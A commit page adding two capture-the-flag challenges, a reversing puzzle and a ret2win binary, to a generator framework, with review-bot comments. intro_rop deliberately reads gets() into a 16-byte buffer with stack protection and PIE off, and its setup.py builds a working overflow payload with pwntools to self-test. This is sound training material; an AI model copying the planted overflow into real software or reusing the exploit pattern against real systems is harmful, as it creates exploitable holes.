
make the ctf si3 proof

master
parent
commit
3bd97c861f
Signed by: govanify GPG Key ID: DE62E1E2A6145556
8 changed files with 250 additions and 2 deletions
  1. +3
    -0
      chals/intro_reverse/Makefile
  2. +102
    -0
      chals/intro_reverse/main.c
  3. +37
    -0
      chals/intro_reverse/setup.py
  4. +2
    -0
      chals/intro_rop/Makefile
  5. +47
    -0
      chals/intro_rop/main.c
  6. +55
    -0
      chals/intro_rop/setup.py
  7. +2
    -0
      infrastructure/nix/binaries.nix
  8. +2
    -2
      libchals.py

+ 3
- 0
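--- a/chals/intro_reverse/Makefile
+++ b/chals/intro_reverse/Makefile
@@ -0,0 +1,3 @@
+all:
+gcc -w -O0 -m32 main.c -no-pie -fno-stack-protector -o intro_reverse
+strip intro_reverse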

+ 102
- 0
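--- a/chals/intro_reverse/main.c
+++ b/chals/intro_reverse/main.c
@@ -0,0 +1,102 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <stdbool.h>
+#include <stdint.h>
+#define BUFSIZE 16
+char *test[80];
+//--JUNK CODE--
+//--JUNK CODE--
+void flag1() {
+//--JUNK CODE--
+//--JUNK CODE--
+strcat(test,"FLAG_PART_1");
+//--JUNK CODE--
+//--JUNK CODE--
+}
+void flag2(unsigned int arg_check1) {
+if (arg_check1 == 0xAABBCCD1) {
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD2) {
+strcat(test,"FLAG_PART_2");
+}
+if (arg_check1 == 0xAABBCCD3) {
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD4) {
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD5) {
+strcat(test,"FLAG_WRONG");
+}
+}
+void flag3(unsigned int arg_check1) {
+if (arg_check1 == 0xAABBCCD1) {
+strcat(test,"FLAG_PART_3");
+}
+if (arg_check1 == 0xAABBCCD2) {
+//--JUNK CODE--
+//--JUNK CODE--
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD3) {
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD4) {
+strcat(test,"FLAG_WRONG");
+}
+if (arg_check1 == 0xAABBCCD5) {
+strcat(test,"FLAG_WRONG");
+}
+}
+void xor(){
+memset(test,0,strlen(test));
+}
+void xor2(){
+memset(test,0,strlen(test));
+}
+void xor3(){
+memset(test,0,strlen(test));
+}
+void vuln() {
+flag1();
+xor();
+flag2(0xAABBCCD2);
+xor2();
+xor3();
+flag3(0xAABBCCD1);
+xor();
+}
+int main(int argc, char **argv){
+setvbuf(stdout, NULL, _IONBF, 0);
+// Set the gid to the effective gid
+// this prevents /bin/sh from dropping the privileges
+gid_t gid = getegid();
+setresgid(gid, gid, gid);
+vuln();
+}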
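Review bot: `char *test[80];` declares an array of 80 pointers, yet every use (`strcat(test, ...)`, `strlen(test)`, `memset(test, 0, ...)`) treats it as a character buffer, and the mismatch only builds quietly because the Makefile passes `-w`. `char test[80];` is what the code means, provided the last flag part that setup.py substitutes stays under 80 bytes. The `setresgid` block and its `/bin/sh` comment look carried over from another challenge, since nothing in this file spawns a shell or opens a file; either drop it or reword the comment to say why it stays. `xor`, `xor2` and `xor3` only zero the buffer, so a comment such as `/* wipes the current flag part; the name is a decoy */` would save the next maintainer a double take.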

+ 37
- 0
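--- a/chals/intro_reverse/setup.py
+++ b/chals/intro_reverse/setup.py
@@ -0,0 +1,37 @@
+import subprocess
+import os
+import sys
+from colorama import Fore, Back, Style
+# chals_out/chal_name/team_name so 3
+sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
+from libchals import *
+from pwn import *
+context.log_level = 'error'
+FNULL = open(os.devnull, 'w')
+# junk code generation
+write_junk_calls("main.c", 53, 3)
+write_junk_calls("main.c", 23, 3)
+write_junk_calls("main.c", 19)
+write_junk_body("main.c", 14)
+# replace flags in source file
+f = open("flag.txt", "r")
+flag=f.readline()
+flag1=flag[:30]
+flag2=flag[30:60]
+flag3=flag[60:]
+replace_text("main.c", "FLAG_PART_1", flag1)
+replace_text("main.c", "FLAG_PART_2", flag2)
+replace_text("main.c", "FLAG_PART_3", flag3)
+replace_text_random_hash("main.c", "FLAG_WRONG", 30)
+subprocess.call("make", stdout=FNULL, stderr=FNULL)
+os.remove("main.c")
+os.remove("Makefile")
+os.remove("setup.py")
+os.remove("flag.txt")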
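Review bot: The result of `subprocess.call("make", ...)` is ignored and its output discarded, and the following lines delete `main.c`, `Makefile`, `setup.py` and `flag.txt`, so a failed build leaves the team directory without a binary and without anything to diagnose it; `subprocess.check_call("make", stdout=FNULL, stderr=FNULL)` would stop the script before the removals. A failure is plausible here: `f.readline()` keeps the trailing newline, so `flag3 = flag[60:]` may carry a line break into the C string literal, and the flag text is pasted into the source unescaped; `flag = f.readline().strip()` covers the first case. The slicing also assumes a flag longer than 60 characters, otherwise `flag3` is empty and the third part silently vanishes, so an explicit length check before the `replace_text` calls is worth adding. `f` and `FNULL` are never closed.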

+ 2
- 0
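--- a/chals/intro_rop/Makefile
+++ b/chals/intro_rop/Makefile
@@ -0,0 +1,2 @@
+all:
+gcc -O0 -m32 main.c -no-pie -fno-stack-protector -o intro_rop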

+ 47
- 0
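--- a/chals/intro_rop/main.c
+++ b/chals/intro_rop/main.c
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <stdbool.h>
+#include <stdint.h>
+#define BUFSIZE 16
+//--JUNK CODE--
+//--JUNK CODE--
+void execute_me() {
+//--JUNK CODE--
+//--JUNK CODE--
+system("cat flag.txt");
+//--JUNK CODE--
+//--JUNK CODE--
+}
+void vuln() {
+char buf[16];
+printf("Vous savez quoi faire :) : ");
+return gets(buf);
+}
+int main(int argc, char **argv){
+setvbuf(stdout, NULL, _IONBF, 0);
+// Set the gid to the effective gid
+// this prevents /bin/sh from dropping the privileges
+gid_t gid = getegid();
+setresgid(gid, gid, gid);
+//--JUNK CODE--
+//--JUNK CODE--
+vuln();
+}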
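Review bot: `return gets(buf);` returns a value from `void vuln()`, which compilers accept only as a leniency and which recent GCC releases treat more strictly; this Makefile does not pass `-w`, so a plain `gets(buf);` keeps the build independent of the toolchain. The unbounded read into `buf[16]` is evidently the intended bug, and a comment such as `/* intentional: challenge vulnerability, do not replace with fgets */` would protect it from a well-meaning cleanup. `BUFSIZE` is defined but unused while the size is hard-coded as 16; use one or drop the other. `system("cat flag.txt")` depends on the inherited `PATH` and working directory while running with the group that `main` has just made real, so reading the file in-process with `fopen`/`fgets` would keep the privileged action limited to printing the flag.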

+ 55
- 0
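--- a/chals/intro_rop/setup.py
+++ b/chals/intro_rop/setup.py
@@ -0,0 +1,55 @@
+import subprocess
+import os
+import sys
+from subprocess import check_output
+# chals_out/chal_name/team_name so 3
+sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
+from libchals import *
+from pwn import *
+context.log_level = 'error'
+FNULL = open(os.devnull, 'w')
+# junk code generation
+write_junk_calls("main.c", 44, 3)
+write_junk_calls("main.c", 24, 3)
+write_junk_calls("main.c", 19)
+write_junk_body("main.c", 13)
+subprocess.call("make", stdout=FNULL, stderr=FNULL)
+# input correction
+elf = ELF("intro_rop")
+rop = ROP(elf)
+execute_me = elf.symbols['execute_me']
+padding = b'A' * 28
+exploit = padding + p32(execute_me) # rop is saved as input
+f = open("input", "wb")
+f.write(exploit)
+f.close()
+# strip it after the ropchain building so they don't have the symbols but we do
+subprocess.call(["strip", "intro_rop"], stdout=FNULL, stderr=FNULL)
+# TESTING BINARY
+f=open("flag.txt", 'r')
+flag = f.readline()
+try:
+output = subprocess.check_output("./intro_rop < input", shell=True, stderr=subprocess.STDOUT)
+except Exception as e:
+output = str(e.output)
+if not flag in output:
+fail_test()
+os.remove("main.c")
+os.remove("Makefile")
+os.remove("setup.py")
+# solution
+os.remove("input")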
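Review bot: The self-test at the end compares a `str` flag with process output in a way that looks unable to pass under Python 3: `check_output` returns `bytes`, so `flag in output` raises `TypeError`, and on the `except` path `str(e.output)` is the `b'...'` repr, in which the real newline kept by `f.readline()` never matches. Comparing bytes with bytes fixes both: `flag = f.readline().strip().encode()`, `except subprocess.CalledProcessError as e:` and `output = e.output`. Narrowing the `except` also matters because a generic `Exception` need not have an `.output` attribute. If `fail_test()` exits or raises (it lives in libchals, outside this page), the `os.remove` calls are skipped and the solution file `input` stays next to the binary handed to the team, so the test and cleanup belong in a `try`/`finally`. The return code of `make` is unchecked as well, and `rop = ROP(elf)` is never used.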

+ 2
- 0
infrastructure/nix/binaries.nix

@ -10,6 +10,8 @@ let
web_server = 64;
web_server_2 = 32;
access_security = 64;
intro_reverse = 32;
intro_rop = 32;
};
mkBinarySourcePath = teamName: challengeMeta: challengesBinarySources + "/${challengeMeta.name}/${teamName}";
genericInstallPhase = ''


+ 2
- 2
libchals.py

@ -49,12 +49,12 @@ def replace_text(fd, to_change, text):
fdd.writelines(buf)
fdd.close()
def replace_text_random_hash(fd, to_change):
def replace_text_random_hash(fd, to_change, size_hash=10):
fdd = open(fd, "r")
buf = fdd.readlines()
for i in range(0, len(buf)-1):
buf[i]=buf[i].replace(to_change,random_name(size=10, chars="0123456789abcdef"))
buf[i]=buf[i].replace(to_change,random_name(size=size_hash, chars="0123456789abcdef"))
fdd = open(fd, "w")
fdd.writelines(buf)
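Review bot: `for i in range(0, len(buf)-1)` stops one line short, so a `to_change` marker on the last line of the file is never replaced; `for i in range(len(buf)):` covers it. The new `size_hash` parameter is undocumented, and a docstring line such as `"""Replace each line's occurrences of to_change with size_hash random hex characters (default 10)."""` would record the contract that the `intro_reverse` setup relies on when it passes 30. The handle from `open(fd, "r")` is rebound to the write handle without being closed; a `with open(...)` block for each phase would release it. The function's end, and the body of `replace_text` above it, lie outside this hunk, so the same loop bound may need checking there.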

